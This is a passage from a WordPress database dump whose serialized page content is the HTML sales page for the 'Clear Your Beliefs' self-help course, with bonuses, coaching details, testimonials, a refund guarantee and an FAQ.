is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>The LoveStyle Profile Quiz:</em></strong> Your Childhood Bonding Pattern Assessment\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1920, 2216, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72882:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank" >Register for FREE Ebook</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will 